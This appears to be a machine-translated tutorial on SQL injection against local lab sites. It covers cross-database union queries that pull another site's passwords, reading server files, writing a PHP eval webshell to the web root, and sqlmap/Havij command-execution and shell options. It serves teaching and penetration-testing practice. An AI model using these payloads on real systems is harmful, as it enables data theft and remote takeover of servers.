Web security SQL injection permissions & cross-database & file read and write & command execution

One, cross-database injection

For example, there are two sites under the same IP corresponding to sites A and B. If site A has high-privilege injection (root), it will cause data leakage of site B or other web applications in the same database.
Demonstrated here:
local A site: http://sqli-labs-master:100/Less-1/ corresponding to the database authority root
local B site: http://127.0.0.1/xinyuan/index.php corresponding to the database authority ordinary user

Insert picture description here


Insert picture description here


then At this point, we first manually inject the permission to view the database on the A website, and id=-1' union select 1,2,user() --+find that it is root permission

Insert picture description here

Check all the databases, -1' union select 1,group_concat(SCHEMA_NAME),3 from information_schema.schemata--+

Insert picture description here


here you can find the database php_wish of website B, as well as other websites. I have introduced the column shcema_name under the information_schema.schemata table. The table that stores the database name information.

Insert picture description here


Well, we then get all the table names under the B website database, and -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='php_wish'--+find that there is only one table name wish,

Insert picture description here


then get all the column names under the wish table name, and -1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='wish' and table_schema='php_wish'--+

Insert picture description here


finally get the data , -1' union select 1,id,password from php_wish.wish--+Here pay attention to cross-database injection, you must add a point to specify the database in front of the table, because the current database is security, and the default query for not specifying the database is that the table under the security database is in

Insert picture description here


front of manual injection, so what is the difference between using the tool sqlmap and manual? If the target site is a high-privilege injection, such as --tables, then the tool will first obtain all databases under high-privilege and then the table name by default. Then how does the tool judge high-privilege, different databases correspond to different built-in functions for judgment, just need --is-dba can judge whether it is high authority

Two, file read and write

When you support high permissions, you can read and write files, fetch some sensitive files, or write a word of Trojan horse

1' ​union select 1,load_file('d:/test.txt'),3--+

Insert picture description here


Write a sentence of Trojan Horse
id=-1' union select 1,'<?php eval($_POST[cmd]);?>',3 into outfile 'D:/phpstudy_pro/WWW/xinyuan/x.php' --+

Insert picture description here


Then obtain the application path of WEB: description file phpinfo, error display, specific source code burst, read middleware configuration, blasting, etc.

Three, injection permissions, command execution

So here is the
Mozhe shooting range of the Sql Server database. We use tools to make a comparison. Use two tools: 1. Pangolin, 2. Havij
1. Compare the operational aspects of Sql Server or other databases.
2. The tool can be operated to automatically identify attacks.

Insert picture description here


Then you can do the following operations, we just choose a few operations

Insert picture description here

Get data

Insert picture description here


execution command

Insert picture description here


File management

Insert picture description here


Havij's operation interface is as follows,

Insert picture description here


so different databases correspond to different operations, and then some operations of Kangkang SQLMAP

--Current-user current user

Insert picture description here

--File-read read from the server

Insert picture description here


Insert picture description here


Insert picture description here

–File-write writes from local to the local file, followed by the file to be written remotely

Insert picture description here


Insert picture description here
Insert picture description here


–sql-shell executes the sql command terminal

Insert picture description here


–os-shell executes the shell terminal.

Insert picture description here


We follow up and we can see that tmpbvizc.php and tmpucvgu have been uploaded. php two files,

Insert picture description here


Insert picture description here


Insert picture description here


then there are the following functions and do not do the operation

--os-cmd=ver 自定义命令
--os-cmd=OSCMD//执行操作系统命令
--os-shell //反弹一个osshell
--os-pwn //pwn,反弹msf下的shell或者vnc
--os-smbrelay //反弹msf下的shell或者vnc
--os-bof //存储过程缓存溢出
--priv-esc //数据库提权
--reg-read --reg-add --reg-del --reg-key
--reg-value --reg-data --reg-type
Insert picture description here